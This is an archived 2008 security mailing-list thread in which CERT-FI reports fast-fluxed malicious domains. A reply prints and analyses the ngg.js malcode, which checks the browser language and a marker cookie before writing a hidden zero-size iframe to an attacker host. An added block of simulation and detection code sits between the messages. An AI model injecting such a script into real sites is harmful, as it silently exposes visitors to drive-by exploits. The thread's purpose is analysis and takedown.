[nsp-sec] Nasty fast-fluxed sites containing javascript malcode [FICORA #183472]
Alan
lclee at cht.com.tw
Fri Jul 11 05:06:39 EDT 2008
ngg.js, according to the code:
________________________________________
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
  var cookieString = document.cookie;
  var start = cookieString.indexOf("updngg=");
  if (start != -1){}else{
    var expires = new Date();
    expires.setTime(expires.getTime()+11*3600*1000);
    document.cookie = "updngg=update;expires="+expires.toGMTString();
    try{
      document.write("<iframe src=http://destbnp.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    }catch(e){}
  }
}
________________________________________
1. Not vulnerable to CN, TW, RU, KO...
2. Other countries will go into the if statement and read the cookie value "updngg"; if it exists, it will do nothing. (It only affects first-time browsing users, and the cookie period is 11 hr.)
We think this is to prevent analysis or some trigger condition.
3. If the condition is met, it will connect to the malicious iframe link.
And we think these hackers don't want to become a global threat, because if it does, every security company will try to solve the sites.
The other possibility is that they have a unique 0day exploit but targeting a specified language version.
That's why they use language to identify users.
Regards,
Alan Lee
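To make the gating behaviour Alan describes easy to reason about, here is an added example (my own code, not from the thread or from ngg.js) that re-implements the language check and cookie gate as a pure function, so an analyst can see which visitor profiles would receive the hidden iframe without executing the malcode in a browser. The static triage indicators and the constructed SAMPLE string are my assumptions, not something taken from the list posting.

```javascript
// Re-implementation of the ngg.js gating logic from the thread (not the malcode itself).
const EXCLUDED = ["ZH-CN", "UR", "RU", "KO", "ZH-TW", "ZH", "HI", "TH", "VI"];
const COOKIE_NAME = "updngg";
const COOKIE_TTL_MS = 11 * 3600 * 1000; // the 11 hour marker cookie

// userLanguage: value of navigator.userLanguage (undefined in browsers that never
// implemented it, e.g. Firefox); cookie: the document.cookie string.
// Returns what the script would do for that visitor and why.
function simulateGate(userLanguage, cookie) {
  // navigator.userLanguage.toUpperCase() throws when the property is missing,
  // so the original script aborts before it ever reaches the language gate.
  if (typeof userLanguage !== "string") {
    return { injects: false, setsCookie: false, reason: "script throws (no userLanguage)" };
  }
  const n = userLanguage.toUpperCase();
  if (EXCLUDED.includes(n)) {
    return { injects: false, setsCookie: false, reason: "language excluded" };
  }
  if (cookie.indexOf(COOKIE_NAME + "=") !== -1) {
    return { injects: false, setsCookie: false, reason: "already marked (repeat visit within " + COOKIE_TTL_MS / 3600000 + "h)" };
  }
  return { injects: true, setsCookie: true, reason: "first visit, non-excluded language" };
}

// Lightweight static triage indicators for the same three traits in other scripts.
// Assumption: all three together are a useful signal for review, not a verdict.
const INDICATORS = [
  { name: "language-gate", re: /navigator\.userLanguage[\s\S]{0,40}toUpperCase\(\)/ },
  { name: "cookie-gate", re: /document\.cookie[\s\S]{0,80}indexOf\(/ },
  { name: "hidden-iframe-write", re: /document\.write\(\s*["']<iframe[^"']*(?:width=0|height=0)/i },
];

// Returns the names of the indicators that fire on a script source.
function scoreScript(src) {
  return INDICATORS.filter(i => i.re.test(src)).map(i => i.name);
}

// Constructed sample that mirrors the structure (placeholder URL, not a live one).
const SAMPLE = 'n=navigator.userLanguage.toUpperCase();if(n!="RU"){var c=document.cookie;' +
  'if(c.indexOf("updngg=")!=-1){}else{document.write("<iframe src=http://example.invalid/x width=0 height=0></iframe>");}}';
```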
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Huopio Kauto
Sent: Friday, July 11, 2008 4:13 PM
To: nsp-security at puck.nether.net
Subject: [nsp-sec] Nasty fast-fluxed sites containing javascript malcode
[FICORA #183472]
----------- nsp-security Confidential --------
Hi folks,
The following URLs relate to a JavaScript that we found
on a Finnish website. Very fresh domain registrations
and heavily fast-fluxed. Any analysis?
Takedown of the domains and sites etc. is more than welcome.
> > hxxp://bkpadd.mobi/cgi-bin/index.cgi?ad
> > hxxp://usaadw.com/cgi-bin/index.cgi?ad
> > hxxp://drvadw.com/cgi-bin/index.cgi?ad
> > hxxp://adwnetw.com/cgi-bin/index.cgi?ad
> > hxxp://loopadd.com/cgi-bin/index.cgi?ad
This seems to be related to SQL injection attacks and
ngg.js. Just google ngg.js...
--Kauto
Kauto Huopio - kauto.huopio at ficora.fi
Senior information security adviser
Finnish Communications Regulatory Authority / CERT-FI
tel. +358-9-6966772, fax +358-9-6966515, mobile +358-50-5826131
CERT-FI watch desk daytime: +358-9-6966510
CERT-FI 24/7 on-call duty officer: +358-44-0120123 / http://www.cert.fi
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.